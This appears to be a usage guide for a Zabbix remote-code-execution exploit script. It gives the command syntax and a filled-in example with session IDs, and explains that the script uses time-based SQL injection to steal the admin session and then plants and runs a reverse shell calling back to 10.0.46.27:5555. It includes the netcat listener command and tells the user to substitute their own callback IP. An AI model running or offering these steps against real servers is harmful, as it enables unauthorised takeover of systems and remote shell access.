python exploit.py --ip <Zabbix_IP> --sid <LowPrivileged_SID> --hostid <HostID> --phpsessid <PHPSESSID> --false_time <FalseTime> --true_time <TrueTime>You have identified a Zabbix server running on IP 192.168.1.100, and you have access to a low-privileged user with the following details:
- Session ID (
sid):d82bf6715e1d3c1f25 - Host ID (
hostid):10107 - PHP session ID (
phpsessid):a4g7f48d9j3r7h8s9g
You want to exploit the RCE vulnerability using this script.
python exploit.py --ip 192.168.1.100 --sid d82bf6715e1d3c1f25 --hostid 10107 --phpsessid a4g7f48d9j3r7h8s9g --false_time 1 --true_time 3--ip 192.168.1.100: The IP address of the Zabbix server.--sid d82bf6715e1d3c1f25: The session ID of a low-privileged user.--hostid 10107: The ID of a host that the low-privileged user can access.--phpsessid a4g7f48d9j3r7h8s9g: The PHP session ID used to authenticate requests.--false_time 1: Time in seconds to sleep in case of a wrong guess during the SQL injection (default is 1 second).--true_time 3: Time in seconds to sleep in case of a correct guess during the SQL injection (default is 3 seconds).
- The script will start by attempting to extract the admin session ID using a time-based SQL injection.
- Once the admin session ID is obtained, the script will create a reverse shell script on the Zabbix server.
- Finally, the script will execute the reverse shell, connecting back to your machine on the specified IP and port (
10.0.46.27:5555in the script).
-
Make sure that your machine is listening on the specified port (
5555in the script) to catch the reverse shell. You can usenetcatfor this:nc -lvnp 5555
-
Replace the IP
10.0.46.27and port5555in theCreateScriptfunction with your own IP and desired port to receive the reverse shell.